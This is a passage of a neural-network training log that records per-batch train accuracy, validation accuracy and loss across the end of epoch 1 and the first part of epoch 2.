Accuracy: 0.897, Loss: 0.926\nEpoch 1 Batch 434/538 - Train Accuracy: 0.914, Validation Accuracy: 0.898, Loss: 0.942\nEpoch 1 Batch 435/538 - Train Accuracy: 0.922, Validation Accuracy: 0.895, Loss: 0.964\nEpoch 1 Batch 436/538 - Train Accuracy: 0.911, Validation Accuracy: 0.894, Loss: 0.966\nEpoch 1 Batch 437/538 - Train Accuracy: 0.921, Validation Accuracy: 0.892, Loss: 0.949\nEpoch 1 Batch 438/538 - Train Accuracy: 0.929, Validation Accuracy: 0.894, Loss: 0.961\nEpoch 1 Batch 439/538 - Train Accuracy: 0.939, Validation Accuracy: 0.903, Loss: 0.915\nEpoch 1 Batch 440/538 - Train Accuracy: 0.930, Validation Accuracy: 0.904, Loss: 0.952\nEpoch 1 Batch 441/538 - Train Accuracy: 0.920, Validation Accuracy: 0.903, Loss: 0.949\nEpoch 1 Batch 442/538 - Train Accuracy: 0.911, Validation Accuracy: 0.903, Loss: 0.921\nEpoch 1 Batch 443/538 - Train Accuracy: 0.908, Validation Accuracy: 0.906, Loss: 0.947\nEpoch 1 Batch 444/538 - Train Accuracy: 0.923, Validation Accuracy: 0.904, Loss: 0.974\nEpoch 1 Batch 445/538 - Train Accuracy: 0.935, Validation Accuracy: 0.900, Loss: 0.929\nEpoch 1 Batch 446/538 - Train Accuracy: 0.938, Validation Accuracy: 0.901, Loss: 0.927\nEpoch 1 Batch 447/538 - Train Accuracy: 0.911, Validation Accuracy: 0.902, Loss: 0.910\nEpoch 1 Batch 448/538 - Train Accuracy: 0.916, Validation Accuracy: 0.903, Loss: 0.926\nEpoch 1 Batch 449/538 - Train Accuracy: 0.937, Validation Accuracy: 0.910, Loss: 0.936\nEpoch 1 Batch 450/538 - Train Accuracy: 0.908, Validation Accuracy: 0.908, Loss: 0.945\nEpoch 1 Batch 451/538 - Train Accuracy: 0.899, Validation Accuracy: 0.907, Loss: 0.983\nEpoch 1 Batch 452/538 - Train Accuracy: 0.920, Validation Accuracy: 0.896, Loss: 0.909\nEpoch 1 Batch 453/538 - Train Accuracy: 0.936, Validation Accuracy: 0.912, Loss: 0.921\nEpoch 1 Batch 454/538 - Train Accuracy: 0.921, Validation Accuracy: 0.914, Loss: 0.936\nEpoch 1 Batch 455/538 - Train Accuracy: 0.925, Validation Accuracy: 0.917, Loss: 0.891\nEpoch 1 Batch 456/538 - Train Accuracy: 0.921, Validation Accuracy: 0.915, Loss: 0.955\nEpoch 1 Batch 457/538 - Train Accuracy: 0.919, Validation Accuracy: 0.919, Loss: 0.925\nEpoch 1 Batch 458/538 - Train Accuracy: 0.916, Validation Accuracy: 0.919, Loss: 0.892\nEpoch 1 Batch 459/538 - Train Accuracy: 0.911, Validation Accuracy: 0.913, Loss: 0.935\nEpoch 1 Batch 460/538 - Train Accuracy: 0.901, Validation Accuracy: 0.912, Loss: 0.907\nEpoch 1 Batch 461/538 - Train Accuracy: 0.915, Validation Accuracy: 0.909, Loss: 0.964\nEpoch 1 Batch 462/538 - Train Accuracy: 0.916, Validation Accuracy: 0.915, Loss: 0.868\nEpoch 1 Batch 463/538 - Train Accuracy: 0.894, Validation Accuracy: 0.922, Loss: 0.977\nEpoch 1 Batch 464/538 - Train Accuracy: 0.932, Validation Accuracy: 0.920, Loss: 0.949\nEpoch 1 Batch 465/538 - Train Accuracy: 0.919, Validation Accuracy: 0.916, Loss: 0.973\nEpoch 1 Batch 466/538 - Train Accuracy: 0.916, Validation Accuracy: 0.911, Loss: 0.934\nEpoch 1 Batch 467/538 - Train Accuracy: 0.924, Validation Accuracy: 0.911, Loss: 0.956\nEpoch 1 Batch 468/538 - Train Accuracy: 0.937, Validation Accuracy: 0.913, Loss: 0.961\nEpoch 1 Batch 469/538 - Train Accuracy: 0.927, Validation Accuracy: 0.915, Loss: 0.933\nEpoch 1 Batch 470/538 - Train Accuracy: 0.911, Validation Accuracy: 0.913, Loss: 0.948\nEpoch 1 Batch 471/538 - Train Accuracy: 0.934, Validation Accuracy: 0.907, Loss: 0.917\nEpoch 1 Batch 472/538 - Train Accuracy: 0.954, Validation Accuracy: 0.911, Loss: 0.923\nEpoch 1 Batch 473/538 - Train Accuracy: 0.903, Validation Accuracy: 0.917, Loss: 
0.960\nEpoch 1 Batch 474/538 - Train Accuracy: 0.927, Validation Accuracy: 0.912, Loss: 0.911\nEpoch 1 Batch 475/538 - Train Accuracy: 0.920, Validation Accuracy: 0.914, Loss: 0.972\nEpoch 1 Batch 476/538 - Train Accuracy: 0.920, Validation Accuracy: 0.907, Loss: 0.921\nEpoch 1 Batch 477/538 - Train Accuracy: 0.904, Validation Accuracy: 0.903, Loss: 0.933\nEpoch 1 Batch 478/538 - Train Accuracy: 0.931, Validation Accuracy: 0.899, Loss: 0.973\nEpoch 1 Batch 479/538 - Train Accuracy: 0.940, Validation Accuracy: 0.910, Loss: 0.889\nEpoch 1 Batch 480/538 - Train Accuracy: 0.931, Validation Accuracy: 0.910, Loss: 0.961\nEpoch 1 Batch 481/538 - Train Accuracy: 0.912, Validation Accuracy: 0.907, Loss: 0.902\nEpoch 1 Batch 482/538 - Train Accuracy: 0.905, Validation Accuracy: 0.902, Loss: 0.958\nEpoch 1 Batch 483/538 - Train Accuracy: 0.910, Validation Accuracy: 0.894, Loss: 0.887\nEpoch 1 Batch 484/538 - Train Accuracy: 0.926, Validation Accuracy: 0.898, Loss: 0.945\nEpoch 1 Batch 485/538 - Train Accuracy: 0.922, Validation Accuracy: 0.903, Loss: 0.968\nEpoch 1 Batch 486/538 - Train Accuracy: 0.928, Validation Accuracy: 0.908, Loss: 0.923\nEpoch 1 Batch 487/538 - Train Accuracy: 0.912, Validation Accuracy: 0.905, Loss: 0.915\nEpoch 1 Batch 488/538 - Train Accuracy: 0.934, Validation Accuracy: 0.903, Loss: 0.918\nEpoch 1 Batch 489/538 - Train Accuracy: 0.903, Validation Accuracy: 0.911, Loss: 0.935\nEpoch 1 Batch 490/538 - Train Accuracy: 0.929, Validation Accuracy: 0.912, Loss: 0.914\nEpoch 1 Batch 491/538 - Train Accuracy: 0.902, Validation Accuracy: 0.913, Loss: 0.945\nEpoch 1 Batch 492/538 - Train Accuracy: 0.921, Validation Accuracy: 0.916, Loss: 0.939\nEpoch 1 Batch 493/538 - Train Accuracy: 0.903, Validation Accuracy: 0.921, Loss: 0.941\nEpoch 1 Batch 494/538 - Train Accuracy: 0.927, Validation Accuracy: 0.920, Loss: 0.942\nEpoch 1 Batch 495/538 - Train Accuracy: 0.913, Validation Accuracy: 0.920, Loss: 0.952\nEpoch 1 Batch 496/538 - Train Accuracy: 0.933, Validation Accuracy: 0.922, Loss: 0.890\nEpoch 1 Batch 497/538 - Train Accuracy: 0.937, Validation Accuracy: 0.922, Loss: 0.951\nEpoch 1 Batch 498/538 - Train Accuracy: 0.918, Validation Accuracy: 0.921, Loss: 0.906\nEpoch 1 Batch 499/538 - Train Accuracy: 0.923, Validation Accuracy: 0.918, Loss: 0.958\nEpoch 1 Batch 500/538 - Train Accuracy: 0.938, Validation Accuracy: 0.912, Loss: 0.897\nEpoch 1 Batch 501/538 - Train Accuracy: 0.923, Validation Accuracy: 0.910, Loss: 0.960\nEpoch 1 Batch 502/538 - Train Accuracy: 0.917, Validation Accuracy: 0.914, Loss: 0.918\nEpoch 1 Batch 503/538 - Train Accuracy: 0.932, Validation Accuracy: 0.917, Loss: 0.960\nEpoch 1 Batch 504/538 - Train Accuracy: 0.948, Validation Accuracy: 0.923, Loss: 0.895\nEpoch 1 Batch 505/538 - Train Accuracy: 0.934, Validation Accuracy: 0.919, Loss: 0.919\nEpoch 1 Batch 506/538 - Train Accuracy: 0.924, Validation Accuracy: 0.911, Loss: 0.913\nEpoch 1 Batch 507/538 - Train Accuracy: 0.897, Validation Accuracy: 0.908, Loss: 0.956\nEpoch 1 Batch 508/538 - Train Accuracy: 0.919, Validation Accuracy: 0.907, Loss: 0.939\nEpoch 1 Batch 509/538 - Train Accuracy: 0.946, Validation Accuracy: 0.910, Loss: 0.907\nEpoch 1 Batch 510/538 - Train Accuracy: 0.926, Validation Accuracy: 0.911, Loss: 0.927\nEpoch 1 Batch 511/538 - Train Accuracy: 0.915, Validation Accuracy: 0.908, Loss: 0.911\nEpoch 1 Batch 512/538 - Train Accuracy: 0.934, Validation Accuracy: 0.908, Loss: 0.939\nEpoch 1 Batch 513/538 - Train Accuracy: 0.892, Validation Accuracy: 0.914, Loss: 0.963\nEpoch 1 Batch 514/538 - 
Train Accuracy: 0.925, Validation Accuracy: 0.922, Loss: 0.930\nEpoch 1 Batch 515/538 - Train Accuracy: 0.921, Validation Accuracy: 0.932, Loss: 0.933\nEpoch 1 Batch 516/538 - Train Accuracy: 0.906, Validation Accuracy: 0.930, Loss: 0.901\nEpoch 1 Batch 517/538 - Train Accuracy: 0.928, Validation Accuracy: 0.922, Loss: 0.924\nEpoch 1 Batch 518/538 - Train Accuracy: 0.895, Validation Accuracy: 0.917, Loss: 0.915\nEpoch 1 Batch 519/538 - Train Accuracy: 0.934, Validation Accuracy: 0.922, Loss: 0.938\nEpoch 1 Batch 520/538 - Train Accuracy: 0.925, Validation Accuracy: 0.921, Loss: 0.958\nEpoch 1 Batch 521/538 - Train Accuracy: 0.931, Validation Accuracy: 0.923, Loss: 1.001\nEpoch 1 Batch 522/538 - Train Accuracy: 0.924, Validation Accuracy: 0.923, Loss: 0.893\nEpoch 1 Batch 523/538 - Train Accuracy: 0.926, Validation Accuracy: 0.929, Loss: 0.901\nEpoch 1 Batch 524/538 - Train Accuracy: 0.936, Validation Accuracy: 0.918, Loss: 0.966\nEpoch 1 Batch 525/538 - Train Accuracy: 0.927, Validation Accuracy: 0.918, Loss: 0.915\nEpoch 1 Batch 526/538 - Train Accuracy: 0.931, Validation Accuracy: 0.911, Loss: 0.942\nEpoch 1 Batch 527/538 - Train Accuracy: 0.946, Validation Accuracy: 0.913, Loss: 0.904\nEpoch 1 Batch 528/538 - Train Accuracy: 0.922, Validation Accuracy: 0.918, Loss: 0.934\nEpoch 1 Batch 529/538 - Train Accuracy: 0.909, Validation Accuracy: 0.926, Loss: 0.944\nEpoch 1 Batch 530/538 - Train Accuracy: 0.900, Validation Accuracy: 0.919, Loss: 0.883\nEpoch 1 Batch 531/538 - Train Accuracy: 0.921, Validation Accuracy: 0.921, Loss: 0.933\nEpoch 1 Batch 532/538 - Train Accuracy: 0.930, Validation Accuracy: 0.919, Loss: 0.932\nEpoch 1 Batch 533/538 - Train Accuracy: 0.931, Validation Accuracy: 0.923, Loss: 0.881\nEpoch 1 Batch 534/538 - Train Accuracy: 0.935, Validation Accuracy: 0.917, Loss: 0.873\nEpoch 1 Batch 535/538 - Train Accuracy: 0.941, Validation Accuracy: 0.922, Loss: 0.919\nEpoch 1 Batch 536/538 - Train Accuracy: 0.953, Validation Accuracy: 0.923, Loss: 0.909\nEpoch 2 Batch 0/538 - Train Accuracy: 0.938, Validation Accuracy: 0.924, Loss: 0.934\nEpoch 2 Batch 1/538 - Train Accuracy: 0.946, Validation Accuracy: 0.923, Loss: 0.946\nEpoch 2 Batch 2/538 - Train Accuracy: 0.929, Validation Accuracy: 0.919, Loss: 0.927\nEpoch 2 Batch 3/538 - Train Accuracy: 0.948, Validation Accuracy: 0.918, Loss: 0.933\nEpoch 2 Batch 4/538 - Train Accuracy: 0.931, Validation Accuracy: 0.912, Loss: 0.913\nEpoch 2 Batch 5/538 - Train Accuracy: 0.928, Validation Accuracy: 0.917, Loss: 0.927\nEpoch 2 Batch 6/538 - Train Accuracy: 0.939, Validation Accuracy: 0.912, Loss: 0.935\nEpoch 2 Batch 7/538 - Train Accuracy: 0.936, Validation Accuracy: 0.915, Loss: 0.934\nEpoch 2 Batch 8/538 - Train Accuracy: 0.938, Validation Accuracy: 0.913, Loss: 0.943\nEpoch 2 Batch 9/538 - Train Accuracy: 0.906, Validation Accuracy: 0.915, Loss: 0.924\nEpoch 2 Batch 10/538 - Train Accuracy: 0.910, Validation Accuracy: 0.917, Loss: 0.929\nEpoch 2 Batch 11/538 - Train Accuracy: 0.930, Validation Accuracy: 0.912, Loss: 0.889\nEpoch 2 Batch 12/538 - Train Accuracy: 0.935, Validation Accuracy: 0.911, Loss: 0.960\nEpoch 2 Batch 13/538 - Train Accuracy: 0.941, Validation Accuracy: 0.919, Loss: 0.909\nEpoch 2 Batch 14/538 - Train Accuracy: 0.934, Validation Accuracy: 0.915, Loss: 0.930\nEpoch 2 Batch 15/538 - Train Accuracy: 0.941, Validation Accuracy: 0.914, Loss: 0.891\nEpoch 2 Batch 16/538 - Train Accuracy: 0.932, Validation Accuracy: 0.921, Loss: 0.892\nEpoch 2 Batch 17/538 - Train Accuracy: 0.929, Validation Accuracy: 0.926, Loss: 
0.930\nEpoch 2 Batch 18/538 - Train Accuracy: 0.942, Validation Accuracy: 0.925, Loss: 0.944\nEpoch 2 Batch 19/538 - Train Accuracy: 0.924, Validation Accuracy: 0.926, Loss: 0.943\nEpoch 2 Batch 20/538 - Train Accuracy: 0.936, Validation Accuracy: 0.924, Loss: 0.968\nEpoch 2 Batch 21/538 - Train Accuracy: 0.942, Validation Accuracy: 0.923, Loss: 0.956\nEpoch 2 Batch 22/538 - Train Accuracy: 0.904, Validation Accuracy: 0.924, Loss: 0.901\nEpoch 2 Batch 23/538 - Train Accuracy: 0.915, Validation Accuracy: 0.925, Loss: 0.939\nEpoch 2 Batch 24/538 - Train Accuracy: 0.932, Validation Accuracy: 0.917, Loss: 0.981\nEpoch 2 Batch 25/538 - Train Accuracy: 0.925, Validation Accuracy: 0.918, Loss: 0.962\nEpoch 2 Batch 26/538 - Train Accuracy: 0.923, Validation Accuracy: 0.913, Loss: 0.963\nEpoch 2 Batch 27/538 - Train Accuracy: 0.940, Validation Accuracy: 0.909, Loss: 0.891\nEpoch 2 Batch 28/538 - Train Accuracy: 0.919, Validation Accuracy: 0.916, Loss: 0.921\nEpoch 2 Batch 29/538 - Train Accuracy: 0.947, Validation Accuracy: 0.915, Loss: 0.919\nEpoch 2 Batch 30/538 - Train Accuracy: 0.923, Validation Accuracy: 0.918, Loss: 0.969\nEpoch 2 Batch 31/538 - Train Accuracy: 0.934, Validation Accuracy: 0.923, Loss: 0.912\nEpoch 2 Batch 32/538 - Train Accuracy: 0.926, Validation Accuracy: 0.918, Loss: 0.948\nEpoch 2 Batch 33/538 - Train Accuracy: 0.937, Validation Accuracy: 0.914, Loss: 0.911\nEpoch 2 Batch 34/538 - Train Accuracy: 0.916, Validation Accuracy: 0.919, Loss: 0.974\nEpoch 2 Batch 35/538 - Train Accuracy: 0.927, Validation Accuracy: 0.920, Loss: 0.888\nEpoch 2 Batch 36/538 - Train Accuracy: 0.933, Validation Accuracy: 0.925, Loss: 0.902\nEpoch 2 Batch 37/538 - Train Accuracy: 0.931, Validation Accuracy: 0.919, Loss: 0.932\nEpoch 2 Batch 38/538 - Train Accuracy: 0.925, Validation Accuracy: 0.921, Loss: 0.898\nEpoch 2 Batch 39/538 - Train Accuracy: 0.936, Validation Accuracy: 0.924, Loss: 0.867\nEpoch 2 Batch 40/538 - Train Accuracy: 0.924, Validation Accuracy: 0.917, Loss: 0.884\nEpoch 2 Batch 41/538 - Train Accuracy: 0.931, Validation Accuracy: 0.921, Loss: 0.961\nEpoch 2 Batch 42/538 - Train Accuracy: 0.929, Validation Accuracy: 0.932, Loss: 0.948\nEpoch 2 Batch 43/538 - Train Accuracy: 0.896, Validation Accuracy: 0.932, Loss: 0.915\nEpoch 2 Batch 44/538 - Train Accuracy: 0.921, Validation Accuracy: 0.933, Loss: 0.901\nEpoch 2 Batch 45/538 - Train Accuracy: 0.930, Validation Accuracy: 0.930, Loss: 0.897\nEpoch 2 Batch 46/538 - Train Accuracy: 0.947, Validation Accuracy: 0.927, Loss: 0.899\nEpoch 2 Batch 47/538 - Train Accuracy: 0.928, Validation Accuracy: 0.929, Loss: 0.939\nEpoch 2 Batch 48/538 - Train Accuracy: 0.894, Validation Accuracy: 0.937, Loss: 0.968\nEpoch 2 Batch 49/538 - Train Accuracy: 0.921, Validation Accuracy: 0.937, Loss: 0.980\nEpoch 2 Batch 50/538 - Train Accuracy: 0.921, Validation Accuracy: 0.928, Loss: 0.901\nEpoch 2 Batch 51/538 - Train Accuracy: 0.929, Validation Accuracy: 0.926, Loss: 0.926\nEpoch 2 Batch 52/538 - Train Accuracy: 0.926, Validation Accuracy: 0.930, Loss: 0.949\nEpoch 2 Batch 53/538 - Train Accuracy: 0.898, Validation Accuracy: 0.928, Loss: 0.912\nEpoch 2 Batch 54/538 - Train Accuracy: 0.942, Validation Accuracy: 0.928, Loss: 0.908\nEpoch 2 Batch 55/538 - Train Accuracy: 0.910, Validation Accuracy: 0.927, Loss: 0.931\nEpoch 2 Batch 56/538 - Train Accuracy: 0.929, Validation Accuracy: 0.920, Loss: 0.951\nEpoch 2 Batch 57/538 - Train Accuracy: 0.918, Validation Accuracy: 0.922, Loss: 0.887\nEpoch 2 Batch 58/538 - Train Accuracy: 0.921, Validation Accuracy: 
0.911, Loss: 0.932\nEpoch 2 Batch 59/538 - Train Accuracy: 0.924, Validation Accuracy: 0.915, Loss: 0.928\nEpoch 2 Batch 60/538 - Train Accuracy: 0.934, Validation Accuracy: 0.906, Loss: 0.940\nEpoch 2 Batch 61/538 - Train Accuracy: 0.940, Validation Accuracy: 0.907, Loss: 0.923\nEpoch 2 Batch 62/538 - Train Accuracy: 0.937, Validation Accuracy: 0.904, Loss: 0.926\nEpoch 2 Batch 63/538 - Train Accuracy: 0.935, Validation Accuracy: 0.907, Loss: 0.929\nEpoch 2 Batch 64/538 - Train Accuracy: 0.923, Validation Accuracy: 0.902, Loss: 0.922\nEpoch 2 Batch 65/538 - Train Accuracy: 0.923, Validation Accuracy: 0.903, Loss: 0.961\nEpoch 2 Batch 66/538 - Train Accuracy: 0.941, Validation Accuracy: 0.910, Loss: 0.916\nEpoch 2 Batch 67/538 - Train Accuracy: 0.940, Validation Accuracy: 0.906, Loss: 0.926\nEpoch 2 Batch 68/538 - Train Accuracy: 0.915, Validation Accuracy: 0.905, Loss: 0.922\nEpoch 2 Batch 69/538 - Train Accuracy: 0.936, Validation Accuracy: 0.908, Loss: 0.901\nEpoch 2 Batch 70/538 - Train Accuracy: 0.940, Validation Accuracy: 0.921, Loss: 0.910\nEpoch 2 Batch 71/538 - Train Accuracy: 0.928, Validation Accuracy: 0.920, Loss: 0.901\nEpoch 2 Batch 72/538 - Train Accuracy: 0.937, Validation Accuracy: 0.922, Loss: 0.939\nEpoch 2 Batch 73/538 - Train Accuracy: 0.925, Validation Accuracy: 0.917, Loss: 0.957\nEpoch 2 Batch 74/538 - Train Accuracy: 0.927, Validation Accuracy: 0.917, Loss: 0.945\nEpoch 2 Batch 75/538 - Train Accuracy: 0.925, Validation Accuracy: 0.922, Loss: 0.975\nEpoch 2 Batch 76/538 - Train Accuracy: 0.932, Validation Accuracy: 0.920, Loss: 0.959\nEpoch 2 Batch 77/538 - Train Accuracy: 0.941, Validation Accuracy: 0.913, Loss: 0.943\nEpoch 2 Batch 78/538 - Train Accuracy: 0.918, Validation Accuracy: 0.909, Loss: 0.885\nEpoch 2 Batch 79/538 - Train Accuracy: 0.933, Validation Accuracy: 0.908, Loss: 0.905\nEpoch 2 Batch 80/538 - Train Accuracy: 0.937, Validation Accuracy: 0.911, Loss: 0.884\nEpoch 2 Batch 81/538 - Train Accuracy: 0.925, Validation Accuracy: 0.919, Loss: 0.955\nEpoch 2 Batch 82/538 - Train Accuracy: 0.927, Validation Accuracy: 0.919, Loss: 0.952\nEpoch 2 Batch 83/538 - Train Accuracy: 0.912, Validation Accuracy: 0.921, Loss: 0.903\nEpoch 2 Batch 84/538 - Train Accuracy: 0.919, Validation Accuracy: 0.926, Loss: 0.949\nEpoch 2 Batch 85/538 - Train Accuracy: 0.934, Validation Accuracy: 0.933, Loss: 0.923\nEpoch 2 Batch 86/538 - Train Accuracy: 0.929, Validation Accuracy: 0.927, Loss: 0.885\nEpoch 2 Batch 87/538 - Train Accuracy: 0.919, Validation Accuracy: 0.922, Loss: 0.944\nEpoch 2 Batch 88/538 - Train Accuracy: 0.933, Validation Accuracy: 0.922, Loss: 0.938\nEpoch 2 Batch 89/538 - Train Accuracy: 0.922, Validation Accuracy: 0.927, Loss: 0.920\nEpoch 2 Batch 90/538 - Train Accuracy: 0.928, Validation Accuracy: 0.927, Loss: 0.962\nEpoch 2 Batch 91/538 - Train Accuracy: 0.939, Validation Accuracy: 0.930, Loss: 0.941\nEpoch 2 Batch 92/538 - Train Accuracy: 0.926, Validation Accuracy: 0.923, Loss: 0.944\nEpoch 2 Batch 93/538 - Train Accuracy: 0.924, Validation Accuracy: 0.921, Loss: 0.875\nEpoch 2 Batch 94/538 - Train Accuracy: 0.934, Validation Accuracy: 0.925, Loss: 0.949\nEpoch 2 Batch 95/538 - Train Accuracy: 0.912, Validation Accuracy: 0.917, Loss: 0.949\nEpoch 2 Batch 96/538 - Train Accuracy: 0.948, Validation Accuracy: 0.919, Loss: 0.892\nEpoch 2 Batch 97/538 - Train Accuracy: 0.936, Validation Accuracy: 0.914, Loss: 0.908\nEpoch 2 Batch 98/538 - Train Accuracy: 0.936, Validation Accuracy: 0.921, Loss: 0.932\nEpoch 2 Batch 99/538 - Train Accuracy: 0.919, 
Validation Accuracy: 0.924, Loss: 0.919\nEpoch 2 Batch 100/538 - Train Accuracy: 0.938, Validation Accuracy: 0.924, Loss: 0.931\nEpoch 2 Batch 101/538 - Train Accuracy: 0.907, Validation Accuracy: 0.926, Loss: 0.937\nEpoch 2 Batch 102/538 - Train Accuracy: 0.906, Validation Accuracy: 0.924, Loss: 0.877\nEpoch 2 Batch 103/538 - Train Accuracy: 0.920, Validation Accuracy: 0.926, Loss: 0.930\nEpoch 2 Batch 104/538 - Train Accuracy: 0.925, Validation Accuracy: 0.921, Loss: 0.928\nEpoch 2 Batch 105/538 - Train Accuracy: 0.942, Validation Accuracy: 0.920, Loss: 0.906\nEpoch 2 Batch 106/538 - Train Accuracy: 0.901, Validation Accuracy: 0.915, Loss: 0.870\nEpoch 2 Batch 107/538 - Train Accuracy: 0.918, Validation Accuracy: 0.919, Loss: 0.923\nEpoch 2 Batch 108/538 - Train Accuracy: 0.944, Validation Accuracy: 0.925, Loss: 0.891\nEpoch 2 Batch 109/538 - Train Accuracy: 0.960, Validation Accuracy: 0.914, Loss: 0.911\nEpoch 2 Batch 110/538 - Train Accuracy: 0.938, Validation Accuracy: 0.909, Loss: 0.911\nEpoch 2 Batch 111/538 - Train Accuracy: 0.934, Validation Accuracy: 0.909, Loss: 0.873\nEpoch 2 Batch 112/538 - Train Accuracy: 0.935, Validation Accuracy: 0.903, Loss: 0.915\nEpoch 2 Batch 113/538 - Train Accuracy: 0.916, Validation Accuracy: 0.902, Loss: 0.887\nEpoch 2 Batch 114/538 - Train Accuracy: 0.936, Validation Accuracy: 0.908, Loss: 0.955\nEpoch 2 Batch 115/538 - Train Accuracy: 0.935, Validation Accuracy: 0.906, Loss: 0.899\nEpoch 2 Batch 116/538 - Train Accuracy: 0.928, Validation Accuracy: 0.908, Loss: 0.933\nEpoch 2 Batch 117/538 - Train Accuracy: 0.915, Validation Accuracy: 0.904, Loss: 0.921\nEpoch 2 Batch 118/538 - Train Accuracy: 0.923, Validation Accuracy: 0.905, Loss: 0.888\nEpoch 2 Batch 119/538 - Train Accuracy: 0.955, Validation Accuracy: 0.920, Loss: 0.941\nEpoch 2 Batch 120/538 - Train Accuracy: 0.941, Validation Accuracy: 0.922, Loss: 0.967\nEpoch 2 Batch 121/538 - Train Accuracy: 0.926, Validation Accuracy: 0.927, Loss: 0.947\nEpoch 2 Batch 122/538 - Train Accuracy: 0.916, Validation Accuracy: 0.924, Loss: 0.933\nEpoch 2 Batch 123/538 - Train Accuracy: 0.923, Validation Accuracy: 0.923, Loss: 0.871\nEpoch 2 Batch 124/538 - Train Accuracy: 0.943, Validation Accuracy: 0.915, Loss: 0.933\nEpoch 2 Batch 125/538 - Train Accuracy: 0.915, Validation Accuracy: 0.910, Loss: 0.956\nEpoch 2 Batch 126/538 - Train Accuracy: 0.925, Validation Accuracy: 0.913, Loss: 0.944\nEpoch 2 Batch 127/538 - Train Accuracy: 0.910, Validation Accuracy: 0.910, Loss: 0.907\nEpoch 2 Batch 128/538 - Train Accuracy: 0.926, Validation Accuracy: 0.910, Loss: 0.917\nEpoch 2 Batch 129/538 - Train Accuracy: 0.923, Validation Accuracy: 0.908, Loss: 0.866\nEpoch 2 Batch 130/538 - Train Accuracy: 0.935, Validation Accuracy: 0.908, Loss: 0.915\nEpoch 2 Batch 131/538 - Train Accuracy: 0.942, Validation Accuracy: 0.913, Loss: 0.892\nEpoch 2 Batch 132/538 - Train Accuracy: 0.908, Validation Accuracy: 0.919, Loss: 0.887\nEpoch 2 Batch 133/538 - Train Accuracy: 0.931, Validation Accuracy: 0.920, Loss: 0.869\nEpoch 2 Batch 134/538 - Train Accuracy: 0.914, Validation Accuracy: 0.923, Loss: 0.923\nEpoch 2 Batch 135/538 - Train Accuracy: 0.932, Validation Accuracy: 0.922, Loss: 0.948\nEpoch 2 Batch 136/538 - Train Accuracy: 0.940, Validation Accuracy: 0.924, Loss: 0.916\nEpoch 2 Batch 137/538 - Train Accuracy: 0.921, Validation Accuracy: 0.924, Loss: 0.932\nEpoch 2 Batch 138/538 - Train Accuracy: 0.923, Validation Accuracy: 0.923, Loss: 0.931\nEpoch 2 Batch 139/538 - Train Accuracy: 0.925, Validation Accuracy: 0.926, Loss: 
0.935\nEpoch 2 Batch 140/538 - Train Accuracy: 0.926, Validation Accuracy: 0.923, Loss: 0.952\nEpoch 2 Batch 141/538 - Train Accuracy: 0.935, Validation Accuracy: 0.914, Loss: 0.934\nEpoch 2 Batch 142/538 - Train Accuracy: 0.937, Validation Accuracy: 0.914, Loss: 0.959\nEpoch 2 Batch 143/538 - Train Accuracy: 0.948, Validation Accuracy: 0.915, Loss: 0.913\nEpoch 2 Batch 144/538 - Train Accuracy: 0.936, Validation Accuracy: 0.920, Loss: 0.995\nEpoch 2 Batch 145/538 - Train Accuracy: 0.919, Validation Accuracy: 0.919, Loss: 0.935\nEpoch 2 Batch 146/538 - Train Accuracy: 0.926, Validation Accuracy: 0.914, Loss: 0.898\nEpoch 2 Batch 147/538 - Train Accuracy: 0.935, Validation Accuracy: 0.911, Loss: 0.920\nEpoch 2 Batch 148/538 - Train Accuracy: 0.916, Validation Accuracy: 0.910, Loss: 0.985\nEpoch 2 Batch 149/538 - Train Accuracy: 0.943, Validation Accuracy: 0.915, Loss: 0.921\nEpoch 2 Batch 150/538 - Train Accuracy: 0.939, Validation Accuracy: 0.917, Loss: 0.911\nEpoch 2 Batch 151/538 - Train Accuracy: 0.938, Validation Accuracy: 0.914, Loss: 0.919\nEpoch 2 Batch 152/538 - Train Accuracy: 0.939, Validation Accuracy: 0.912, Loss: 0.962\nEpoch 2 Batch 153/538 - Train Accuracy: 0.916, Validation Accuracy: 0.908, Loss: 0.930\nEpoch 2 Batch 154/538 - Train Accuracy: 0.945, Validation Accuracy: 0.906, Loss: 0.923\nEpoch 2 Batch 155/538 - Train Accuracy: 0.932, Validation Accuracy: 0.921, Loss: 0.950\nEpoch 2 Batch 156/538 - Train Accuracy: 0.936, Validation Accuracy: 0.930, Loss: 0.898\nEpoch 2 Batch 157/538 - Train Accuracy: 0.939, Validation Accuracy: 0.928, Loss: 0.883\nEpoch 2 Batch 158/538 - Train Accuracy: 0.939, Validation Accuracy: 0.925, Loss: 0.870\nEpoch 2 Batch 159/538 - Train Accuracy: 0.922, Validation Accuracy: 0.927, Loss: 0.928\nEpoch 2 Batch 160/538 - Train Accuracy: 0.919, Validation Accuracy: 0.926, Loss: 0.923\nEpoch 2 Batch 161/538 - Train Accuracy: 0.930, Validation Accuracy: 0.919, Loss: 0.912\nEpoch 2 Batch 162/538 - Train Accuracy: 0.930, Validation Accuracy: 0.918, Loss: 0.932\nEpoch 2 Batch 163/538 - Train Accuracy: 0.916, Validation Accuracy: 0.914, Loss: 0.915\nEpoch 2 Batch 164/538 - Train Accuracy: 0.932, Validation Accuracy: 0.907, Loss: 1.000\nEpoch 2 Batch 165/538 - Train Accuracy: 0.913, Validation Accuracy: 0.915, Loss: 0.943\nEpoch 2 Batch 166/538 - Train Accuracy: 0.950, Validation Accuracy: 0.911, Loss: 0.904\nEpoch 2 Batch 167/538 - Train Accuracy: 0.924, Validation Accuracy: 0.908, Loss: 0.961\nEpoch 2 Batch 168/538 - Train Accuracy: 0.927, Validation Accuracy: 0.913, Loss: 0.925\nEpoch 2 Batch 169/538 - Train Accuracy: 0.927, Validation Accuracy: 0.922, Loss: 0.928\nEpoch 2 Batch 170/538 - Train Accuracy: 0.921, Validation Accuracy: 0.914, Loss: 0.967\nEpoch 2 Batch 171/538 - Train Accuracy: 0.912, Validation Accuracy: 0.914, Loss: 0.887\nEpoch 2 Batch 172/538 - Train Accuracy: 0.916, Validation Accuracy: 0.914, Loss: 0.923\nEpoch 2 Batch 173/538 - Train Accuracy: 0.930, Validation Accuracy: 0.914, Loss: 0.896\nEpoch 2 Batch 174/538 - Train Accuracy: 0.935, Validation Accuracy: 0.914, Loss: 0.934\nEpoch 2 Batch 175/538 - Train Accuracy: 0.943, Validation Accuracy: 0.914, Loss: 0.905\nEpoch 2 Batch 176/538 - Train Accuracy: 0.924, Validation Accuracy: 0.912, Loss: 0.930\nEpoch 2 Batch 177/538 - Train Accuracy: 0.922, Validation Accuracy: 0.919, Loss: 0.941\nEpoch 2 Batch 178/538 - Train Accuracy: 0.898, Validation Accuracy: 0.920, Loss: 0.899\nEpoch 2 Batch 179/538 - Train Accuracy: 